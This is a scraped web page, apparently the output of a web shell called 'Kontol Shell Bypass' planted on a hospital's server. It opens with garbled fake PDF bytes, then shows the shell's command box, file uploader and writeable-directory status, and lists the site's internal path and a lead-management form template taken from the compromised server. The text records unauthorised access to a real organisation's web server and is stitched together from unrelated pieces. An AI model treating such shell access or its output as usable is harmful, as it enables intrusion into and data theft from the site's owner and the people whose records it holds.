%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardahospital_old.org/lms/views/tpl/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital_old.org/lms/views/tpl/lead_data_set_form.html
<div class="modal bs-modal-lg in" id="dsFormModal" tabindex="-1" role="dialog" aria-hidden="true" data-backdrop="static">
    <div class="modal-dialog modal-full">
        <div class="modal-content">
            <div class="modal-header">
                <button type="button" class="close" data-dismiss="modal" aria-hidden="true" ng-click="DS.clear_data()"></button>
                <h4 class="modal-title" ng-if="!DS.from_other_page">{{DS.data.id?'Update':'Create'}} Data Set</h4>
                <h4 class="modal-title" ng-if="DS.from_other_page">Lead Data Set</h4>
            </div>
            
            <div class="modal-body err-abs form-lbl-grey">
                <form id="dsfrm" autocomplete="off" spellcheck="false">
                    <input type="hidden" name="id" value="{{DS.data.id}}" />
                    <input type="hidden" name="user_id" value="{{DS.ds_user_id}}" />
                    <div class="row" ng-if="!DS.from_other_page">
                        <div class="col-md-4 form-group">
                            <label class="req">Data Set Name</label>
                            <input type="text" class="form-control" name="title" ng-model="DS.data.title">
                        </div>
                        <div class="col-md-2 form-group">
                            <label>Expiry Date</label>
                            <input type="text" class="form-control cal hasCal" name="expiry_date" ng-model="DS.data.expiry_date">
                        </div>
                        <div class="col-md-2 form-group">
                            <label>Leads From Date</label>
                            <input type="text" class="form-control cal hasCal" name="lead_date_from" ng-model="DS.data.lead_date_from">
                        </div>
                        <div class="col-md-2 form-group">
                            <label>Leads To Date</label>
                            <input type="text" class="form-control cal hasCal" name="lead_date_to" ng-model="DS.data.lead_date_to">
                        </div>
                        <div class="col-md-2 form-group">
                            <label>For Campaign?</label>
                            <select class="form-control" name="is_campaign" ng-model="DS.data.is_campaign">
                                <option value="0">No</option>
                                <option value="1">Yes</option>
                            </select>
                        </div>
                    </div>
                    
                    <div class="row mingap">
                        <!-- States -->
                        <div class="col-md-3 chkDSState">
                            <div style="overflow-y:scroll">
                                <table class="table table-condensed table-striped table-bordered table-advance table-hover nomrgn">
                                    <thead class="vmid">
                                        <tr>
                                            <th class="w20">
                                                <input type="checkbox" class="allChk" onclick="allChk('.chkDSState')">
                                            </th>
                                            <th>Select State</th>
                                        </tr>
                                    </thead>
                                </table>
                            </div>

                            <div class="leadOptHeight">
                                <table class="table table-condensed table-striped table-bordered table-advance table-hover nomrgn">
                                    <tbody class="vmid">
                                        <tr ng-repeat="(i,r) in DS.mdata.states">
                                            <td class="w20">
                                                <input type="checkbox" class="chk" name="states[]" value="{{r.id}}" ng-checked="DS.is_checked('states', r.id)" onclick="chk('.chkDSState')">
                                            </td>
                                            <td>
                                                <a href="" ng-click="DS.cities(r.id)">{{r.title}}</a>
                                            </td>
                                        </tr>
                                    </tbody>
                                </table>
                            </div>
                        </div>

                        <!-- Programs -->
                        <div class="col-md-3 chkPrgTbl">
                            <div style="overflow-y:scroll">
                                <table class="table table-condensed table-striped table-bordered table-advance table-hover nomrgn">
                                    <thead class="vmid">
                                        <tr>
                                            <th class="w20">
                                                <input type="checkbox" class="allChk" onclick="allChk('.chkPrgTbl')">
                                            </th>
                                            <th>Select Center of Excellence</th>
                                        </tr>
                                    </thead>
                                </table>
                            </div>

                            <div class="leadOptHeight">
                                <table class="table table-condensed table-striped table-bordered table-advance table-hover nomrgn">
                                    <tbody class="vmid">
                                        <tr ng-repeat="(i,r) in DS.mdata.programs">
                                            <td class="w20">
                                                <input type="checkbox" class="chk" name="programs[]" value="{{r.id}}" ng-checked="DS.is_checked('programs', r.id)" onclick="chk('.chkPrgTbl')">
                                            </td>
                                            <td>{{r.title}}</td>
                                        </tr>
                                    </tbody>
                                </table>
                            </div>
                        </div>

                        <!-- Fields -->
                        <div class="col-md-3 chkLFTbl">
                            <div style="overflow-y:scroll">
                                <table class="table table-condensed table-striped table-bordered table-advance table-hover nomrgn">
                                    <thead class="vmid">
                                        <tr>
                                            <th class="w20">
                                                <input type="checkbox" class="allChk" onclick="allChk('.chkLFTbl')">
                                            </th>
                                            <th>Select Field</th>
                                        </tr>
                                    </thead>
                                </table>
                            </div>

                            <div class="leadOptHeight">
                                <table class="table table-condensed table-striped table-bordered table-advance table-hover nomrgn">
                                    <tbody class="vmid">
                                        <tr ng-repeat="(k,v) in DS.mdata.leadFields">
                                            <td class="w20">
                                                <input type="checkbox" class="chk" name="fields[]" value="{{k}}" ng-checked="DS.is_checked('fields', k)" onclick="chk('.chkLFTbl')">
                                            </td>
                                            <td>{{v}}</td>
                                        </tr>
                                    </tbody>
                                </table>
                            </div>
                        </div>

                        <!-- -->
                        <div class="col-md-3">
                            <!-- Utm Sources -->
                            <div class="chkUtmTbl mb10">
                                <div style="overflow-y:scroll">
                                    <table class="table table-condensed table-striped table-bordered table-advance table-hover nomrgn">
                                        <thead class="vmid">
                                            <tr>
                                                <th class="w20">
                                                    <input type="checkbox" class="allChk" onclick="allChk('.chkUtmTbl')">
                                                </th>
                                                <th>Select Utm Source</th>
                                            </tr>
                                        </thead>
                                    </table>
                                </div>
    
                                <div class="utmSourcesBx" style="max-height: 325px; overflow-y:scroll">
                                    <table class="table table-condensed table-bordered table-advance nomrgn">
                                        <tbody class="vmid">
                                            <tr>
                                                <td>
                                                    <div class="row mingap">
                                                        <div class="col-md-6" ng-repeat="(i,r) in DS.mdata.utm_sources">
                                                            <label>
                                                                <input type="checkbox" class="chk" name="utm_sources[]" value="{{r.id}}" ng-checked="DS.is_checked('utm_sources', r.id)" onclick="chk('.chkUtmTbl')">
                                                                {{r.title}}
                                                            </label>
                                                        </div>
                                                        <div class="clearfix"></div>
                                                    </div>
                                                </td>
                                            </tr>
                                        </tbody>
                                    </table>
                                </div>
                            </div>

                            <!-- Encryption -->
                            <table class="table table-condensed table-bordered table-advance nomrgn chkEncTbl">
                                <thead class="vmid">
                                    <tr>
                                        <th>
                                            <input type="checkbox" class="allChk" onclick="allChk('.chkEncTbl')">
                                            Encrypted Field
                                        </th>
                                    </tr>
                                </thead>
                                <tbody class="vmid">
                                    <tr>
                                        <td>
                                            <div class="inblock w80" ng-repeat="(i,r) in DS.mdata.encryptionFields">
                                                <label class="nomrgn">
                                                    <input type="checkbox" class="chk" name="{{r.k}}" value="1" ng-checked="DS.data[r.k]==1" onclick="chk('.chkEncTbl')">
                                                    {{r.v}}
                                                </label>
                                            </div>
                                        </td>
                                    </tr>
                                </tbody>
                            </table>
                        </div>
                    </div>
                </form>
            </div>

            <div class="modal-footer">
                <button type="button" class="btn dark btn-outline" data-dismiss="modal" ng-click="DS.clear_data()">Close</button>
                <button type="button" class="btn green" ng-click="DS.save()">Save</button>
            </div>
        </div>
    </div>
</div>

<!-- Cities Modal -->
<div class="modal bs-modal-sm in" id="dsCitiesModal" tabindex="-1" role="dialog" aria-hidden="true" data-backdrop="static">
    <div class="modal-dialog modal-sm">
        <div class="modal-content">
            <div class="modal-header">
                <button type="button" class="close" data-dismiss="modal" aria-hidden="true"></button>
                <h4 class="modal-title">Select Cities</h4>
            </div>
            
            <div class="modal-body">
                <form id="dsCitiesForm" autocomplete="off" spellcheck="false">
                    <input type="hidden" name="id" value="{{DS.data.id}}" />
                    <input type="hidden" name="state_id" value="{{DS.ds_city_state_id}}" />
                    
                    <div class="chkCityTbl">
                        <div style="overflow-y:scroll">
                            <table class="table table-condensed table-striped table-bordered table-advance table-hover nomrgn">
                                <thead class="vmid">
                                    <tr>
                                        <th class="w20">
                                            <input type="checkbox" class="allChk" onclick="allChk('.chkCityTbl')">
                                        </th>
                                        <th>Select City</th>
                                    </tr>
                                </thead>
                            </table>
                        </div>

                        <div class="leadOptHeight">
                            <table class="table table-condensed table-striped table-bordered table-advance table-hover nomrgn">
                                <tbody class="vmid">
                                    <tr ng-repeat="(i,r) in DS.mdata.cities">
                                        <td class="w20">
                                            <input type="checkbox" class="chk" name="cities[]" value="{{r.id}}" ng-checked="r.isadded" onclick="chk('.chkCityTbl')">
                                        </td>
                                        <td>
                                            {{r.title}}
                                        </td>
                                    </tr>
                                </tbody>
                            </table>
                        </div>
                    </div>
                </form>
            </div>

            <div class="modal-footer">
                <button type="button" class="btn dark btn-outline" data-dismiss="modal">Close</button>
                <button type="button" class="btn green" ng-click="DS.saveCities()">Save</button>
            </div>
        </div>
    </div>
</div>

Kontol Shell Bypass